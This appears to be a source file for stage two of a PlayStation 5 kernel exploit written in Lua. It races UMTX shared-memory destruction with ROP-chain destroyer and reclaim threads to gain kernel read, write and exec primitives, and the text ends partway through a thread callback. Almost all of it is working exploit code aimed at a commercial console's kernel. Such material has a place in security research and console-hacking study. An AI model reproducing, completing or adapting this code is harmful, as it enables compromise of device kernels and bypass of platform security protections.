flatz/graal.lua Secret

## graal.lua
if is_ps5_platform() then
	set_print_sink("socket", { endpoint = globals.log_server_address, use_tcp = false })
end

if dbg_client ~= nil then
	dbgf("sending ping")
	if not dbg_client.ping() then
		warnf("sending ping request failed")
	end
end

function check_stage2()
	return type(estate) == "table"
end

local function check_prerequisites()
	if type(check_stage1) ~= "function" or not check_stage1() then
		errorf("stage #1 not loaded")
	end

	if check_stage2() then
		errorf("stage #2 already loaded, skipping")
	end
end

if clean_each_source then
	-- Wipe out source code, otherwise it will occupy too much stack trace in case of error.
	wipe_out_source(main_rop, check_prerequisites, false, "stage2")
end

check_prerequisites()
ensure_dbg_client_healthy()

-------------------------------------------------------------------------------

function kern_install_peek_poke_from_preloader()
	if supercall_peek == nil or supercall_poke == nil then
		return false
	end

	kern_read = function(rop, kaddr, uaddr, size)
		assert(type(rop) == "table")

		assert(is_uint64(kaddr) or type(kaddr) == "number")
		assert(is_uint64(uaddr) or type(uaddr) == "number")
		assert(type(size) == "number")

		if size ~= nil then
			assert(type(size) == "number")

			if size == 0 then
				return 0
			end
		else
			return nil
		end

		if not supercall_peek(rop, kaddr, uaddr, size) then
			warnf("supercall_peek(kaddr:%s, uaddr:%s, size:0x%x) failed", kaddr, uaddr, size)
			return nil
		end

		return size
	end

	kern_write = function(rop, kaddr, uaddr, size, params)
		assert(type(rop) == "table")

		assert(is_uint64(kaddr) or type(kaddr) == "number")
		assert(is_uint64(uaddr) or type(uaddr) == "number")

		if size ~= nil then
			assert(type(size) == "number")

			if size == 0 then
				return 0
			end
		else
			return nil
		end

		if not supercall_poke(rop, uaddr, kaddr, size, params) then
			warnf("supercall_poke(uaddr:%s, kaddr:%s, size:0x%x) failed", uaddr, kaddr, size)
			return nil
		end

		return size
	end

	return true
end

-------------------------------------------------------------------------------

if estate == nil then
	estate = {}
end

if is_kernel_pwned(main_rop) then
	if not kern_install_peek_poke_from_preloader() then
		errorf("installing peek/poke from preloader failed")
	end

	kern_exec = function(rop, rop_cb, body_cb)
		errorf("kern_exec not implemented")
	end

	kern_leak_stack_kptrs = function(rop, rop_cb, sleep_time, dump_ptrs)
		errorf("kern_leak_stack_kptrs not implemented")
	end

	-- XXX: Even though it is not a failure condition, we need to stop further execution.
	errorf("kernel already exploited, skipping")
end

-------------------------------------------------------------------------------

local toggle_state_debugging = false
local toggle_set_thread_priorities = false
local determine_pipe_caps = false
local dump_kstack_partially = false
local dump_kstack = false
local dump_kstack_ptrs = false
local use_blocking_select = true

-------------------------------------------------------------------------------

-- Preload some syscalls.
resolve_syscalls(main_rop, {
	"shm_open",
	"shm_unlink",

	"pipe",
	"fstat",
	"ftruncate",
	"ioctl",
	"select",

	"mmap",
	"munmap",
	"mprotect",

	"nanosleep",

	"cpuset_getaffinity",
	"cpuset_setaffinity",
	"rtprio_thread",

	"sched_yield",

	"umtx_op",
})

-------------------------------------------------------------------------------

exp = {
	-- Common parameters.
	MAX_DUMMY_SHMS = 0,
	MAX_DESTROYER_THREADS = 2,
	MAX_RECLAIM_OBJECTS = 10,
	MAX_RECLAIM_SYSTEM_CALLS = 1, -- For |ioctl| method instead of |select|.
	MAX_SEARCH_LOOP_ATTEMPTS = use_blocking_select and 8 or 32,
	MAX_EXTRA_UMTX_SHMS = 1,
	ROP_CAPACITY = 1024,
	ROP_SCRATCH_SIZE = 0x1000,

	-- Executive ROP parameters.
	EXEC_ROP_CAPACITY = 1024,
	EXEC_ROP_SCRATCH_SIZE = 0x1000,

	-- Needed to determine victim thread ID.
	RECLAIMED_THREAD_MARKER_BASE = 0x00414141,

	-- To be able to know file descriptor for specific SHM we set its size as multiple of |MAGIC_NUMBER|.
	MAGIC_NUMBER = 0x1000,

	-- Amounts of time we need to wait before and after observing kstack and after we find it.
	KSTACK_WAIT_PERIOD = use_blocking_select and sec_to_usec(0.05) or sec_to_usec(0.25),
	FINAL_WAIT_PERIOD = 5000,

	-- Buffer size for thread marker, it should not be larger than |SYS_IOCTL_SMALL_SIZE|,
	-- otherwise |sys_ioctl| will use heap instead of stack.
	THREAD_MARKER_BUFFER_SIZE = globals.SYS_IOCTL_SMALL_SIZE,

	-- Pinned cores and priorities for threads.
	THREAD_PRIORITY_TYPE = globals.RTP_PRIO_REALTIME, -- |RTP_PRIO_FIFO| should also work.
	MAIN_THREAD_CORES = 0,
	MAIN_THREAD_PRIORITY = 256,
	DESTROYER_THREAD_CORES = { 1, 2 },
	DESTROYER_THREAD_PRIORITY = { 256, 256 },
	LOOKUP_THREAD_CORES = 3,
	LOOKUP_THREAD_PRIORITY = 400,
	RECLAIM_THREAD_PRIORITY = 450,

	-- Victim thread name that we can use for lookup.
	VICTIM_THREAD_NAME = "lulzpero",

	-- We do not want to trigger direct copy, thus buffer size should be smaller than |PIPE_MINDIRECT|.
	MAX_PIPE_BUFFER_SIZE = math.floor(globals.PIPE_MINDIRECT / 2),

	-- Number of times kernel thread's heap pointer should occur in kernel stack to distinguish it from other kernel pointers.
	TD_OCCURRENCE_THRESHOLD = 8,

	-- Commands for reclaimed kernel thread.
	CMD_KREAD = 1,
	CMD_KWRITE = 2,
	CMD_KEXEC = 3,
}

assert(exp.MAX_PIPE_BUFFER_SIZE < globals.PIPE_MINDIRECT)

table.merge(estate, {
	first_original_fd = -1,
	exploited_fds = {},
	saved_kstack_addrs = {},
})

-------------------------------------------------------------------------------

function flush_read_pipe_buffer(rop, fd)
	assert(type(fd) == "number")

	local tmp_buf_size = globals.BIG_PIPE_SIZE
	local tmp_buf, tmp_buf_addr = temp_alloc(tmp_buf_size)
	local size = 0

	while true do
		local result, errno = do_syscall_safe(rop, "read", fd, tmp_buf_addr, tmp_buf_size)
		if result:is_minus_one() then
			if errno ~= globals.EAGAIN then
				warnf("read failed (errno:%d)", errno)
				return nil
			end
			break
		elseif result.lo == 0 then
			break
		end

		size = size + result.lo
	end

	return size
end

-- It always equals to |BIG_PIPE_SIZE|, thus no need to calculate it each time.
local function calc_pipe_buffer_capacity(rop)
	local rpipe_fd, wpipe_fd = create_pipe(rop, globals.O_NONBLOCK)
	if rpipe_fd == nil or wpipe_fd == nil then
		warnf("creating pipe failed")
		return nil
	end

	local tmp_buf_size = globals.BIG_PIPE_SIZE
	local tmp_buf, tmp_buf_addr = temp_alloc(tmp_buf_size)
	local capacity = 0

	while true do
		local result, errno = do_syscall_safe(rop, "write", wpipe_fd, tmp_buf_addr, tmp_buf_size)
		if result:is_minus_one() then
			if errno == globals.EAGAIN then
				local flush_size = flush_read_pipe_buffer(rop, rpipe_fd)
				if flush_size == nil then
					warnf("flushing read pipe buffer failed")
					capacity = nil
				end
				dbgf("flush size: 0x%x", flush_size)
			else
				warnf("write failed (errno:%d)", errno)
				capacity = nil
			end
			break
		elseif result.lo == 0 then
			break
		end

		capacity = capacity + result.lo
	end

	if capacity ~= nil then
		-- Calculated capacity can be less than actual, so round it up to nearest possible value.
		capacity = bit32.round_pow2(capacity, globals.SMALL_PIPE_SIZE)
	end

	if not close_file(rop, wpipe_fd) then
		warnf("closing write pipe %d failed", wpipe_fd)
	end
	if not close_file(rop, rpipe_fd) then
		warnf("closing read pipe %d failed", rpipe_fd)
	end

	return capacity
end

local function setup_shared_memory(rop, storage_size, read_addr, write_addr)
	assert(type(storage_size) == "number")
	assert(storage_size > 0)

	dbgf("opening shared memory file")
	local shm = shmem:new(rop)
	if shm == nil then
		warnf("opening shared memory file failed")
		return nil
	end

	local status = true
	local result

	-- Alignment is not really needed but left it as is.
	storage_size = bit32.round_pow2(storage_size, globals.PAGE_SIZE)

	dbgf("truncating shared memory for rop chain to 0x%x", storage_size)
	if not shm:truncate(storage_size) then
		warnf("truncating shared memory for rop chain to 0x%x failed", storage_size)
		status = false
	else
		local flags

		if read_addr ~= nil then
			assert(is_uint64(read_addr))
			flags = bit32.bor(globals.MAP_SHARED, globals.MAP_FIXED)
		else
			flags = globals.MAP_SHARED
		end

		dbgf("mapping readable memory at %s of size 0x%x for rop chain", read_addr and read_addr or "<any>", storage_size)
		result = shm:map(read_addr, storage_size, bit32.bor(globals.PROT_READ, globals.PROT_WRITE), bit32.bor(flags, globals.MAP_PREFAULT_READ), 0)
		if result == nil then
			warnf("mapping readable memory at %s of size 0x%x for rop chain failed", read_addr and read_addr or "<any>", storage_size)
			status = false
		end
		if read_addr ~= nil then
			assert(result == read_addr)
		else
			read_addr = result
		end

		if write_addr ~= nil then
			assert(is_uint64(write_addr))
			flags = bit32.bor(globals.MAP_SHARED, globals.MAP_FIXED)
		else
			flags = globals.MAP_SHARED
		end

		dbgf("mapping writeable memory at %s of size 0x%x for rop chain", write_addr and write_addr or "<any>", storage_size)
		result = shm:map(write_addr, storage_size, bit32.bor(globals.PROT_READ, globals.PROT_WRITE), bit32.bor(flags, globals.MAP_PREFAULT_READ), 0)
		if result == nil then
			warnf("mapping writeable memory at %s of size 0x%x for rop chain failed", write_addr and write_addr or "<any>", storage_size)
			status = false
		end
		if write_addr ~= nil then
			assert(result == write_addr)
		else
			write_addr = result
		end

		-- Trigger prefault because |MAP_PREFAULT_READ| is not available in game process.
		prefault(rop, read_addr, storage_size)
		prefault(rop, write_addr, storage_size)
	end

	if not status then
		if write_addr ~= nil then
			dbgf("unmapping writeable memory at %s of size 0x%x for rop chain", write_addr, storage_size)
			if not shm:unmap(write_addr, storage_size) then
				warnf("unmapping writeable memory at %s of size 0x%x for rop chain failed", write_addr, storage_size)
			end
			write_addr = nil
		end

		if read_addr ~= nil then
			dbgf("unmapping readable memory at %s of size 0x%x for rop chain", read_addr, storage_size)
			if not shm:unmap(read_addr, storage_size) then
				warnf("unmapping readable memory at %s of size 0x%x for rop chain failed", read_addr, storage_size)
			end
			read_addr = nil
		end
	end

	dbgf("closing shared memory file")
	if not shm:close() then
		warnf("closing shared memory file failed")
	end

	shm = nil

	collectgarbage()

	if not status then
		return nil
	end

	return {
		read_addr = read_addr,
		write_addr = write_addr,
		storage_size = storage_size,
	}
end

local function release_and_recreate_shared_memory_if_needed(rop, thread_index)
	assert(is_uint64(estate.combined_rop_storage_read_addr) and is_uint64(estate.combined_rop_storage_write_addr))
	assert(type(estate.combined_rop_storage_size) == "number")

	local storage_backup_buf, storage_backup_addr
	local read_addr, write_addr

	if thread_index ~= nil then
		local offset = (exp.MAX_DESTROYER_THREADS + thread_index) * estate.combined_rop_storage_size

		storage_backup_buf, storage_backup_addr = temp_alloc(estate.combined_rop_storage_size)

		read_addr = estate.combined_rop_storage_read_addr + offset
		write_addr = estate.combined_rop_storage_write_addr + offset
	end

	local status = true

	if storage_backup_addr ~= nil then
		dbgf("backing up rop chain memory of reclaimed thread from %s to %s", read_addr, storage_backup_addr)
		mem_copy(rop, storage_backup_addr, read_addr, estate.combined_rop_storage_size)
	end

	dbgf("unmapping entire writeable shared memory at %s of size 0x%x", estate.combined_rop_storage_write_addr, estate.combined_rop_storage_total_size)
	if not unmap_memory(rop, estate.combined_rop_storage_write_addr, estate.combined_rop_storage_total_size) then
		dbgf("unmapping entire writeable shared memory at %s of size 0x%x failed", estate.combined_rop_storage_write_addr, estate.combined_rop_storage_total_size)
		status = false
	end

	dbgf("unmapping entire readable shared memory at %s of size 0x%x", estate.combined_rop_storage_read_addr, estate.combined_rop_storage_total_size)
	if not unmap_memory(rop, estate.combined_rop_storage_read_addr, estate.combined_rop_storage_total_size) then
		dbgf("unmapping entire readable shared memory at %s of size 0x%x failed", estate.combined_rop_storage_read_addr, estate.combined_rop_storage_total_size)
		status = false
	end

	if status and storage_backup_addr ~= nil then
		local result, errno

		dbgf("recreating shared memory (read @ %s, write @ %s) of size 0x%x", read_addr, write_addr, estate.combined_rop_storage_size)
		result = setup_shared_memory(rop, estate.combined_rop_storage_size, read_addr, write_addr)
		if result ~= nil then
			dbgf("recovering rop chain memory of reclaimed thread")
			mem_copy(rop, write_addr, storage_backup_addr, estate.combined_rop_storage_size)
		else
			warnf("recreating shared memory (read @ %s, write @ %s) of size 0x%x failed", read_addr, write_addr, estate.combined_rop_storage_size)
			status = false
		end

		dbgf("writing to pipe fd %d at %s of size 0x%x", estate.wpipe_fd, estate.pipe_buf_addr, exp.MAX_PIPE_BUFFER_SIZE)
		result, errno = do_syscall_safe(rop, "write", estate.wpipe_fd, estate.pipe_buf_addr, exp.MAX_PIPE_BUFFER_SIZE)
		if result:is_minus_one() then
			warnf("write failed (errno:%d)", errno)
			status = false
		elseif result.lo ~= exp.MAX_PIPE_BUFFER_SIZE then
			warnf("unexpected pipe write result 0x%x", result.lo)
			status = false
		end

		local return_value_addr = estate.thread_return_value_addr + (exp.MAX_DESTROYER_THREADS + thread_index) * 0x8
		local errno_addr = estate.thread_errno_addr + (exp.MAX_DESTROYER_THREADS + thread_index) * 0x8

		dbgf("waiting until reclaim thread flush pipe")
		while memory.read32(errno_addr) ~= 0 or memory.read32(return_value_addr) ~= exp.MAX_PIPE_BUFFER_SIZE do
			yield(main_rop)
		end
		dbgf("pipe flushed")
	end

	return status
end

-------------------------------------------------------------------------------

dbgf("page size: 0x%x", globals.PAGE_SIZE)

dbgf("kstack pages: %u", globals.num_kstack_pages)
dbgf("kstack size: 0x%x", globals.kstack_size)

dbgf("pcb size: 0x%x", globals.sizeof_pcb)

dbgf("kinfo proc size: 0x%x", globals.sizeof_kinfo_proc)

dbgf("proc size: 0x%x", globals.sizeof_proc)

dbgf("thread size: 0x%x", globals.sizeof_thread)

dbgf("trapframe size: 0x%x", globals.sizeof_trapframe)

-------------------------------------------------------------------------------

-- Set name for main thread.
if not set_current_thread_name(main_rop, "main") then
	errorf("setting main thread name failed")
end

-- Initial value for CPU affinity mask: 0x7f [0,1,2,3,4,5,6]
-- Initial value for thread priority: type=10 (PRI_FIFO), prio=700

-- Get initial CPU affinity mask for main thread.
local initial_cpu_affinity = get_current_thread_cpu_affinity(main_rop)

--
-- Create things needed for kernel memory manipulations.
--

runner(function()
	-- Calculate required size for state buffer.
	estate.state_size =
		0x8 + -- race done flag
		0x8 + -- ready flag
		0x8 + -- destroy flag
		0x8 + -- check done flag
		0x8 + -- done flag
		0x8 + -- num ready threads
		0x8 + -- num completed threads
		0x8 + -- num destroys
		0x8 + -- num finished threads
		0x8 + -- original fd
		0x8 + -- lookup fd
		0x8 + -- winner fd
		0x8 * exp.MAX_DESTROYER_THREADS + -- fds for reclaim
		0x8 + -- victim thread id
		globals.sizeof_timespec + -- timeout
		(0x8 + 0x8) * (1 + exp.MAX_DESTROYER_THREADS + exp.MAX_RECLAIM_OBJECTS) + -- scratch area for return values/errnos for destroyer, lookup and reclaim threads
		0x8 * exp.MAX_RECLAIM_OBJECTS + -- reclaim thread stack return address
		exp.THREAD_MARKER_BUFFER_SIZE * exp.MAX_RECLAIM_OBJECTS + -- reclaim thread markers
		0x8 + -- cmd
		0x8 + -- cmd wait flag
		0x8 + -- r/w src ptr
		0x8 + -- r/w dst ptr
		0x8 -- r/w size

	-- Allocate state buffer and set up needed addresses.
	estate.state_addr_base = mem_alloc(main_rop, estate.state_size)
	dbgf("state @ %s (size: 0x%x)", estate.state_addr_base, estate.state_size)

	estate.race_done_flag_addr = estate.state_addr_base + 0x0
	estate.ready_flag_addr = estate.race_done_flag_addr + 0x8
	estate.destroy_flag_addr = estate.ready_flag_addr + 0x8
	estate.check_done_flag_addr = estate.destroy_flag_addr + 0x8
	estate.done_flag_addr = estate.check_done_flag_addr + 0x8
	estate.num_ready_threads_addr = estate.done_flag_addr + 0x8
	estate.num_completed_threads_addr = estate.num_ready_threads_addr + 0x8
	estate.num_destroys_addr = estate.num_completed_threads_addr + 0x8
	estate.num_finished_threads_addr = estate.num_destroys_addr + 0x8
	estate.original_fd_addr = estate.num_finished_threads_addr + 0x8
	estate.lookup_fd_addr = estate.original_fd_addr + 0x8
	estate.winner_fd_addr = estate.lookup_fd_addr + 0x8
	estate.fds_for_reclaim_addr = estate.winner_fd_addr + 0x8
	estate.victim_thread_id_addr = estate.fds_for_reclaim_addr + exp.MAX_DESTROYER_THREADS * 0x8
	estate.timeout_addr = estate.victim_thread_id_addr + 0x8
	estate.thread_return_value_addr = estate.timeout_addr + globals.sizeof_timespec
	estate.thread_errno_addr = estate.thread_return_value_addr + (1 + exp.MAX_DESTROYER_THREADS + exp.MAX_RECLAIM_OBJECTS) * 0x8
	estate.reclaim_thread_stack_return_addr = estate.thread_errno_addr + (1 + exp.MAX_DESTROYER_THREADS + exp.MAX_RECLAIM_OBJECTS) * 0x8
	estate.reclaim_thread_marker_addr = estate.reclaim_thread_stack_return_addr + exp.MAX_RECLAIM_OBJECTS * 0x8
	estate.cmd_addr = estate.reclaim_thread_marker_addr + exp.MAX_RECLAIM_OBJECTS * exp.THREAD_MARKER_BUFFER_SIZE
	estate.cmd_wait_flag_addr = estate.cmd_addr + 0x8
	estate.rw_src_ptr_addr = estate.cmd_wait_flag_addr + 0x8
	estate.rw_dst_ptr_addr = estate.rw_src_ptr_addr + 0x8
	estate.rw_size_addr = estate.rw_dst_ptr_addr + 0x8

	local state_end_addr = estate.rw_size_addr + 0x8

	-- Ensure that state buffer have correct size.
	local real_state_size = (state_end_addr - estate.state_addr_base).lo
	if real_state_size ~= estate.state_size then
		errorf("incorrect state size (allocated: 0x%x, real: 0x%x)", estate.state_size, real_state_size)
	end

	if toggle_state_debugging then
		logf("race_done_flag @ %s (offset: 0x%x)", estate.race_done_flag_addr, (estate.race_done_flag_addr - exp.state_addr).lo)
		logf("ready_flag @ %s (offset: 0x%x)", estate.ready_flag_addr, (estate.ready_flag_addr - exp.state_addr).lo)
		logf("destroy_flag @ %s (offset: 0x%x)", estate.destroy_flag_addr, (estate.destroy_flag_addr - exp.state_addr).lo)
		logf("check_done_flag @ %s (offset: 0x%x)", estate.check_done_flag_addr, (estate.check_done_flag_addr - exp.state_addr).lo)
		logf("done_flag @ %s (offset: 0x%x)", estate.done_flag_addr, (estate.done_flag_addr - exp.state_addr).lo)
		logf("num_ready_threads @ %s (offset: 0x%x)", estate.num_ready_threads_addr, (estate.num_ready_threads_addr - exp.state_addr).lo)
		logf("num_completed_threads @ %s (offset: 0x%x)", estate.num_completed_threads_addr, (estate.num_completed_threads_addr - exp.state_addr).lo)
		logf("num_destroys @ %s (offset: 0x%x)", estate.num_destroys_addr, (estate.num_destroys_addr - exp.state_addr).lo)
		logf("num_finished_threads @ %s (offset: 0x%x)", estate.num_finished_threads_addr, (estate.num_finished_threads_addr - exp.state_addr).lo)
		logf("original_fd @ %s (offset: 0x%x)", estate.original_fd_addr, (estate.original_fd_addr - exp.state_addr).lo)
		logf("victim_fd @ %s (offset: 0x%x)", estate.lookup_fd_addr, (estate.lookup_fd_addr - exp.state_addr).lo)
		logf("winner_fd @ %s (offset: 0x%x)", estate.winner_fd_addr, (estate.winner_fd_addr - exp.state_addr).lo)
		logf("fds_for_reclaim @ %s (offset: 0x%x)", estate.fds_for_reclaim_addr, (estate.fds_for_reclaim_addr - exp.state_addr).lo)
		logf("victim_thread_id @ %s (offset: 0x%x)", estate.victim_thread_id_addr, (estate.victim_thread_id_addr - exp.state_addr).lo)
		logf("timeout @ %s (offset: 0x%x)", estate.timeout_addr, (estate.timeout_addr - exp.state_addr).lo)
		logf("thread_return_value @ %s (offset: 0x%x)", estate.thread_return_value_addr, (estate.thread_return_value_addr - exp.state_addr).lo)
		logf("thread_errno @ %s (offset: 0x%x)", estate.thread_errno_addr, (estate.thread_errno_addr - exp.state_addr).lo)
		logf("reclaim_thread_stack_return @ %s (offset: 0x%x)", estate.reclaim_thread_stack_return_addr, (estate.reclaim_thread_stack_return_addr - exp.state_addr).lo)
		logf("reclaim_thread_marker @ %s (offset: 0x%x)", estate.reclaim_thread_marker_addr, (estate.reclaim_thread_marker_addr - exp.state_addr).lo)
		logf("cmd @ %s (offset: 0x%x)", estate.cmd_addr, (estate.cmd_addr - exp.state_addr).lo)
		logf("cmd_wait_flag @ %s (offset: 0x%x)", estate.cmd_wait_flag_addr, (estate.cmd_wait_flag_addr - exp.state_addr).lo)
		logf("rw_src_ptr @ %s (offset: 0x%x)", estate.rw_src_ptr_addr, (estate.rw_src_ptr_addr - exp.state_addr).lo)
		logf("rw_dst_ptr @ %s (offset: 0x%x)", estate.rw_dst_ptr_addr, (estate.rw_dst_ptr_addr - exp.state_addr).lo)
		logf("rw_size @ %s (offset: 0x%x)", estate.rw_size_addr, (estate.rw_size_addr - exp.state_addr).lo)
	end
end)

function prepare_exploit()
	-- Clear state buffer.
	mem_clear(main_rop, estate.state_addr_base, estate.state_size)

	-- Set up SHM keys.
	if shm_keys_addr ~= nil then
		mem_free(main_rop, estate.shm_keys_addr)
		estate.shm_keys_addr = nil
	end

	estate.shm_keys_addr = mem_alloc(main_rop, 3 * 0x8)

	estate.shm_key_1 = estate.shm_keys_addr + 0x0
	estate.shm_key_2 = estate.shm_key_1 + 0x8
	estate.shm_key_3 = estate.shm_key_2 + 0x8

	-- Create, truncate and destroy dummy SHM objects.
	runner(function()
		local dummy_fds = {}

		for i = 1, exp.MAX_DUMMY_SHMS do
			dbgf("creating dummy shared memory #%u", i)
			local fd = create_anon_shm(main_rop)
			if fd == nil then
				warnf("creating dummy shared memory #%u failed", i)
				return false
			end

			dbgf("truncating dummy shared memory fd %d", fd)
			if not truncate_file(main_rop, fd, globals.kstack_size) then
				warnf("truncating dummy shared memory fd %d failed", fd)
				close_file(main_rop, fd)
				return false
			end

			dbgf("mapping dummy shared memory fd %d", fd)
			local addr = map_memory(main_rop, 0, globals.kstack_size, bit32.bor(globals.PROT_READ, globals.PROT_WRITE), bit32.bor(globals.MAP_SHARED), fd, 0)
			if addr ~= nil then
				dbgf("writing data to dummy shared memory fd %d at %s", fd, addr)
				memory.write32(addr, 0)

				dbgf("unmapping dummy shared memory fd %d at %s", fd, addr)
				if not unmap_memory(main_rop, addr, globals.kstack_size) then
					warnf("unmapping dummy shared memory fd %d at %s failed", fd, addr)
				end
			end

			table.insert(dummy_fds, fd)
		end

		for i = #dummy_fds, 1, -1 do
			local fd = dummy_fds[i]

			dbgf("closing dummy shared memory fd %d", fd)
			if not close_file(main_rop, fd) then
				warnf("closing dummy shared memory fd %d failed", fd)
				return false
			end
		end
	end)

	-- Create pipe to use for kernel primitives.
	if estate.rpipe_fd == nil and estate.wpipe_fd == nil then
		-- Set up pipe for kernel read/write primitives.
		local rpipe_fd, wpipe_fd = create_pipe(main_rop)
		if rpipe_fd == nil or wpipe_fd == nil then
			warnf("creating pipe failed")
			return false
		end

		estate.rpipe_fd = rpipe_fd
		dbgf("read pipe fd: %d", estate.rpipe_fd)

		estate.wpipe_fd = wpipe_fd
		dbgf("write pipe fd: %d", estate.wpipe_fd)

		if determine_pipe_caps then
			estate.pipe_buf_capacity = calc_pipe_buffer_capacity(main_rop)
			if estate.pipe_buf_capacity == nil then
				warnf("calculating pipe buffer capacity failed")
				return false
			end
		else
			estate.pipe_buf_capacity = globals.BIG_PIPE_SIZE
		end
		dbgf("pipe buf capacity: 0x%x", estate.pipe_buf_capacity)
		assert(estate.pipe_buf_capacity >= globals.PAGE_SIZE)

		-- Allocate memory for pipe data.
		estate.pipe_buf_addr = mem_alloc_clear(main_rop, estate.pipe_buf_capacity)
		dbgf("pipe buf @ %s", estate.pipe_buf_addr)
	end

	-- Set moderate timeout to avoid locks.
	make_timeval_from_usec(estate.timeout_addr, sec_to_usec(1))

	-- Set up ROP storage.
	runner(function()
		dbgf("setting up rop chains storage")

		local params = determine_ropchain_storage_params(exp.ROP_CAPACITY, exp.ROP_SCRATCH_SIZE, nil, nil, nil)
		assert(params ~= nil)

		-- Alignment is not really needed but left it as is.
		local storage_size = bit32.round_pow2(params.storage_size, 0x1000)
		local num_threads = 1 + exp.MAX_DESTROYER_THREADS + exp.MAX_RECLAIM_OBJECTS
		local total_storage_size = storage_size * num_threads
		local result

		dbgf("setting up shared memory for combined rop chains of size 0x%x", total_storage_size)
		result = setup_shared_memory(main_rop, total_storage_size, nil, nil)
		if result == nil then
			errorf("setting up shared memory for combined rop chains of size 0x%x failed", total_storage_size)
		end

		dbgf("combined rop storage read @ %s", result.read_addr)
		dbgf("combined rop storage write @ %s", result.write_addr)
		dbgf("combined rop storage total size: 0x%x", result.storage_size)
		dbgf("combined rop storage size: 0x%x", storage_size)

		estate.combined_rop_storage_read_addr = result.read_addr
		estate.combined_rop_storage_write_addr = result.write_addr
		estate.combined_rop_storage_total_size = result.storage_size
		estate.combined_rop_storage_size = storage_size

		dbgf("setting up rop chains storage done")
	end)

	assert(estate.combined_rop_storage_read_addr ~= nil and estate.combined_rop_storage_write_addr ~= nil)

	estate.rop_storage_cleanup_cb = function(storage)
		assert(storage.storage_read_addr ~= nil and storage.storage_write_addr ~= nil)
		assert(storage.real_storage_size ~= nil)

		-- No need to clean up memory now because we'll unmap entire memory at once later.

		dbgf("no need to cleaning up right now")

		return true
	end

	dbgf("creating execute rop chain")
	estate.exec_rop = ropchain:new(make_ropchain_storage_rw_default(main_rop, "kexec", exp.EXEC_ROP_CAPACITY, exp.EXEC_ROP_SCRATCH_SIZE), true)
	if estate.exec_rop == nil then
		warnf("no executive rop chain")
		return false
	end

	estate.destroyer_thrs = {}
	estate.lookup_thr = nil
	estate.reclaim_thrs = {}

	estate.kstack_addr = nil

	return true
end

function initial_exploit()
	-- Pin main thread to one core.
	dbgf("pinning main thread to one core")
	if not set_current_thread_cpu_affinity(main_rop, exp.MAIN_THREAD_CORES) then
		errorf("pinning main thread to one core failed")
	end

	if toggle_set_thread_priorities then
		-- Set main thread priority to highest possible priority.
		if not set_current_thread_priority(main_rop, { type = exp.THREAD_PRIORITY_TYPE, prio = exp.MAIN_THREAD_PRIORITY }) then
			errorf("setting main thread priority failed")
		end
	end

	--
	-- Create destroyer and lookup threads.
	--

	local destroyer_thread_index = 0

	local function destroyer_rop_cb(rop, thread_id_addr)
		local marker_for_outer_loop_start = rop:generate_marker("outer_loop_start")
		local marker_for_outer_loop_end = rop:generate_marker("outer_loop_end")
		local marker_for_inner_loop1_start = rop:generate_marker("inner_loop1_start")
		local marker_for_inner_loop1_end = rop:generate_marker("inner_loop1_end")
		local marker_for_inner_loop2_start = rop:generate_marker("inner_loop2_start")
		local marker_for_inner_loop2_end = rop:generate_marker("inner_loop2_end")
		local marker_for_destroy_end = rop:generate_marker("destroy_end")
		local marker_for_inner_loop3_start = rop:generate_marker("inner_loop3_start")
		local marker_for_inner_loop3_end = rop:generate_marker("inner_loop3_end")
		local marker_for_inner_loop4_start = rop:generate_marker("inner_loop4_start")
		local marker_for_inner_loop4_end = rop:generate_marker("inner_loop4_end")

		local scratch_rax_addr = rop:scratch_rax_addr()
		local scratch_errno_addr = rop:scratch_errno_addr()
		local return_value_addr = estate.thread_return_value_addr + (1 + destroyer_thread_index) * 0x8
		local errno_addr = estate.thread_errno_addr + (1 + destroyer_thread_index) * 0x8

		--
		-- Outer loop that runs until race done flag is set.
		--

		rop:set_marker(marker_for_outer_loop_start)

		-- Check for race done flag set.
		rop:gen_conditional({ estate.race_done_flag_addr }, "==", 0, marker_for_inner_loop1_start, marker_for_outer_loop_end)

		rop:push_set_rsp(rop:use_marker(marker_for_outer_loop_start))

		--
		-- Inner loop #1 that waits until all threads and objects will be initialized.
		--

		rop:set_marker(marker_for_inner_loop1_start)

		-- Check for ready flag set.
		rop:gen_conditional({ estate.ready_flag_addr }, "==", 0, function(rop)
			rop:push_syscall_noret("sched_yield")
		end, marker_for_inner_loop1_end)

		rop:push_set_rsp(rop:use_marker(marker_for_inner_loop1_start))

		rop:set_marker(marker_for_inner_loop1_end)

		-- Notify main thread that destroyer thread is ready to start.
		rop:push_add_atomic_32(estate.num_ready_threads_addr, 1)

		--
		-- Inner loop #2 that waits for destroy signal.
		--

		rop:set_marker(marker_for_inner_loop2_start)

		-- Check for destroy flag set.
		rop:gen_conditional({ estate.destroy_flag_addr }, "==", 0, function(rop)
			rop:push_syscall_noret("sched_yield")
		end, marker_for_inner_loop2_end)

		rop:push_set_rsp(rop:use_marker(marker_for_inner_loop2_start))

		rop:set_marker(marker_for_inner_loop2_end)

		-- Trigger destroying of UMTX.
		rop:push_syscall_safe("umtx_op", 0, globals.UMTX_OP_SHM, globals.UMTX_SHM_DESTROY, estate.shm_key_1, 0)
		rop:push_load_rax(scratch_rax_addr)
		rop:push_store_rax(return_value_addr)
		rop:push_load_rax(scratch_errno_addr)
		rop:push_store_rax(errno_addr)

		-- Check for destroy result.
		rop:gen_conditional({ return_value_addr }, "!=", -1, function(rop)
			-- Notify that destroy succeeded.
			rop:push_add_atomic_32(estate.num_destroys_addr, 1)
			rop:push_set_rsp(rop:use_marker(marker_for_destroy_end))
		end, marker_for_destroy_end)

		rop:set_marker(marker_for_destroy_end)

		-- Notify that destroyer thread done its main job.
		rop:push_add_atomic_32(estate.num_completed_threads_addr, 1)

		--
		-- Inner loop #3 that waits for check done.
		--

		rop:set_marker(marker_for_inner_loop3_start)

		-- Check for check done flag set.
		rop:gen_conditional({ estate.check_done_flag_addr }, "==", 0, function(rop)
			rop:push_syscall_noret("sched_yield")
		end, marker_for_inner_loop3_end)

		rop:push_set_rsp(rop:use_marker(marker_for_inner_loop3_start))

		rop:set_marker(marker_for_inner_loop3_end)

		-- Notify main thread that destroyer thread is ready to finish.
		rop:push_add_atomic_32(estate.num_ready_threads_addr, 1)

		--
		-- Inner loop #4 that waits for done flag.
		--

		rop:set_marker(marker_for_inner_loop4_start)

		-- Check for done flag set.
		rop:gen_conditional({ estate.done_flag_addr }, "==", 0, function(rop)
			rop:push_syscall_noret("sched_yield")
		end, marker_for_inner_loop4_end)

		rop:push_set_rsp(rop:use_marker(marker_for_inner_loop4_start))

		rop:set_marker(marker_for_inner_loop4_end)

		-- Notify main thread that destroyer thread was finished.
